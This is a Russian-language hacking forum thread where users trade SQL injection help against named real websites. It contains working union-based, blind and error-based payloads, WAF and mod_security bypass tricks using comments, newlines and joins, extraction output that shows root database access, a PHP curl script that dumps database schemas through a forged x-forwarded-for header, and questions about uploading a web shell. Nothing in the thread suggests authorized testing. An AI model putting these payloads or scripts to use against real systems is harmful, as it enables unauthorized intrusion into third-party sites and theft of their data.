Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)

зы /administrator/ 403, не залиться

Br@!ns said:
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
зы /administrator/ 403, не залиться


Возможно прав нет, в большинстве случаев залиться можно только тогда, когда на какую то диру стоять права записи для others, например 777 и сервер в ней что-то исполняет - PHP, SSI, etc...

Надо что-то другое использовать - прочтите виртуальные хосты, другие файлы, конфиги, ищите там полезную инфу...

Br@!ns said:
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
зы /administrator/ 403, не залиться


Если стоит sape, то у них в корне сайта должна быть врайтабельная директория для скриптов сапы, правда закрытая на исполнение .htaccess -ом. Попробуй.

Можно ли что сделать с этой уязвимостью?


http://www.v3toys.ru/index.php?nid=19109

Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?

%Inject_Here%

http://www.itsecteam.com/files/havij/havij_help-english.pdf

narviss said:
Можно ли что сделать с этой уязвимостью?


нет там ничего...

OxoTnik said:
Да можно, blabla.com/news/
%Inject_Here%
2013


2013 как default injection value выставляется как бы


Br@!ns said:
Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?


Но все же консультация по использованию кракнутого автоматического эксплуататора sql инъекций с уязвимостями никак не вяжется и да, у него есть волшебный файл справки, который называется Help.chm, там есть такой волшебный раздел, который называетсяBasic Settings -> Injecting URL Rewrite Page

http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+

http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка

не пойму что не так

http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+

Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+


Too many connections. Положили сканерами.

Запрос обрабатывается следующим скриптом:

http://s017.radikal.ru/i410/1309/40/24b05eb56a4f.png

?name=root'\**\or\**\1='1

По идее \**\ должно работать как пробел или нет? Скуль не проходит. Как можно обойти?

Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+


Сайт на базе CMS Drupal

Ищите готовые эксплоиты.

kilo_star said:
Запрос обрабатывается следующим скриптом:
http://s017.radikal.ru/i410/1309/40/24b05eb56a4f.png
?name=root'\**\or\**\1='1
По идее \**\ должно работать как пробел или нет? Скуль не проходит. Как можно обойти?


root'or(1)='1

BigBear said:
root'or(1)='1


спасибо Так а с применением /**/ можно как-то обойти?

kilo_star said:
спасибо
Так а с применением /**/ можно как-то обойти?


Рассмотрим данное регулярное выражение:


PHP:
if(preg_match('/\s+/',$_GET["name"])) {

die("ERROR NO SPACE");

}



В строке производится поиск по символьному классу \s, то есть любых пробельных символов - пробел, TAB, etc... Строка, которая их не содержит или строка, длина которой больше pcre.backtrack_limit (в случае с массивом POST) фильтрацию проходит.

Использование /**/ возможно. Зависимости - mg=off поскольку sql-инъекция в кавычках.

Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+


WAFвырезает некоторые конструкции, а так-же полностью блокирует запрос по рейтингу вхождения в него опасных конструкций.

Очень жестокие фильтры, очень много критериев, в том числе проверяется длина(49 символов):


Code:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,lpad(user(),22,0x3A),1) %23

General error: 1105 XPATH syntax error: '::::::::root@localhost'

Все сжимал буквально по одному символу, на один символ больше - уже блок, зато юзер - root При WAF - очень редкое явление.

UDP1:


Code:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(0x3A,user()),1)% 23

В этом варианте concat так-же работает, если будет блок - воспользуйтесь вариантом выше.

UDP2:

Еще варианты сжатия:


Code:
При спец. символах в выводе:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,user(),1)%23

Без них(Работает не всегда):
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(':',user()),1)%2 3

UDP4:

Забыл про саму строку:


Code:
http://www.grafomanam.net/author/%27*updatexml(0,concat(':',version()),1)%23

5.5.33-log

Путь очень длинный:


PHP:
/usr/local/www/apache22/data/grafomanam/sites/index.php



Если только блайндом таблицы выводить с брутом полей - на простой вывод идет очень много символов. MySQL на UNIX-сокете висит, так что удаленно не подключится. Или как вариант - обойти ЧПУ, если фильтр на длину в нем.

o3 said:
что с этой скулей не так?
__http://www.fuelthebrain.com/mini-books/print.php?bookID=1329876958' order by 11%23


An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

(в Вашем случае фильтруются union и select)

Крутите,как слепую:


http://www.fuelthebrain.com/mini-books/print.php?bookID=1329876958
'+and+substr(version(),1,1)=5 and '1'='1

YaBtr said:
Крутите,как слепую:


Легче крутить с использованием вывода, второе и третье поля принтабельны:


Code:
1329876958'+/*!%0Dunion%0Dselect%0D*FROM(select 1) a1 join (select version()) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11*/+--+



PHP:
Используем комментарий дл я обхода одного фильтра:

/*!КОД*/

Символ переноса для второ го:

/*!%0Dunion%0Dselect%0D*/

И для третьего фильтра со здаем собственную таблицу через подзапросы,псевдон� �мы и join:

/*!%0Dunion%0Dselect%0D*FROM(select 1) a1 join (select version()) a2 join (select 3) a3 jo in (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (sel ect 8) a8 join (select 9) a9 join (select� �10) a10 join (select 11) a11*/

Always said:
http://site.ru/works/247964/
Host: obshelit.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
x-forwarded-for:1"/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/count(*)/**/from/**/information_schema.tables/**/limit/**/50,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://site.ru/works/248095/
Начинаю перебирать лимит, все перестает отображаться...в чем проблема?


Вы что, в count(*) лимит перебираете? Работает, пример вывода таблиц с колонками:


PHP:
"http://site.ru/works/247964/",

CURLOPT_RETURNTRANSFER=>True,

CURLOPT_ENCODING=>'gzip, deflate',

));

for ($i=1;true;$i+=64) {

//$main = 'version()';

$main='MID(CONCAT(@p:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE TABLE_SCHEMA� �!=0x696e666f726d6174696f6e5f736368656d61 and @p:= CONCAT(@p,0x3B, TABLE_SCHEMA,0x3A,TABLE_NAM E, 0x3A,COLUMN_NAME) ),@p),5)';



$sql='1"or 1 group by concat( mid(('.$main.'),'.$i.', 64), floor(rand(0)*2)) having min(0) or 1 #' ;

$sql=str_replace(" ","/**/",$sql);



curl_setopt($ch,CURLOPT_HTTPHEADER, array("x-forwarded-for: ".$sql));



$resp=curl_exec($ch);

$resp=explode('Duplicate entry \'',$resp,2);

echostr_replace(";","\n",substr($resp[1],0,64));

}

curl_close($ch);



Выход: Ctrl+C. Запуск в консоли.

Ошибка

Ошибка при попытке подключиться к information_schema.tables

+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,1 6+from+information_schema.tables/*

Query Failed: Can't read dir of './test/' (errno: 13)

Query:Select a.*, b.image_filename, b.image_width, b.image_height from AMJ_Article a left join AMJ_Article_Image b on (a.article_id = b.article_id and b.image_main = 1) where a.article_type = 'TRENDS' and a.article_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16 from information_schema.tables/*

Что это значит?

версия 5.0.22

vsid55 said:
Ошибка при попытке подключиться к information_schema.tables
+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,1 6+from+information_schema.tables/*
Query Failed: Can't read dir of './test/' (errno: 13)
Query:Select a.*, b.image_filename, b.image_width, b.image_height from AMJ_Article a left join AMJ_Article_Image b on (a.article_id = b.article_id and b.image_main = 1) where a.article_type = 'TRENDS' and a.article_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16 from information_schema.tables/*
Что это значит?
версия 5.0.22


пишет что не может прочитать дерикторрию тест, так как не хватает прав

Добрый день!

при запросе:

?id=-4099+union+select+1,2,3,4,5,@@version,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33--

версия выводится замечательно, но если мы заменим @@version на version(), то откроется просто белая страница, сервер фильтрует круглые скобки, невозможно обратиться ни к одной функции из-за этого. Как можно обойти данную проблему?

OxoTnik said:
захексить весь запрос


-4099+0x756E696F6E2B73656C6563742B312C322C332C342C3 52C404076657273696F6E2C372C382C392C31302C31312C313 22C31332C31342C31352C31362C31372C31382C31392C32302 C32312C32322C32332C32342C32352C32362C32372C32382C3 2392C33302C33312C33322C3333

Ничего не дало.

Version () захекси, а не всю адресную строку.

cipa21 said:
Добрый день!
при запросе:
?id=-4099+union+select+1,2,3,4,5,@@version,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33--
версия выводится замечательно, но если мы заменим @@version на version(), то откроется просто белая страница, сервер фильтрует круглые скобки, невозможно обратиться ни к одной функции из-за этого. Как можно обойти данную проблему?


Вариант 1: Не использовать функции

Вариант 2: Проверить, попадают ли данные из какой-либо колонки в другой запрос, и есть ли там инъекция. Если да - то можно обойти фильтр посылая данные второй инъекции хексом в колонку.

Вариант 3: NULL-byte, не соответствующие друг другу скобки, Комментарии /*! SQL*/, Символ переноса строки между скобками при фильтре парных скобок version(%0A%0D), etc


OxoTnik said:
захексить весь запрос




kingbeef said:
Version () захекси, а не всю адресную строку.


В MySQL хекс используется только для строк. Захексить функцию, или весь запрос вам не удастся.

http://np.com.ua/search.html?keywords=1'+order+by+2+--+

http://np.com.ua/search.html?keywords=1'+union+SELECT+1,2+--+

Как быть?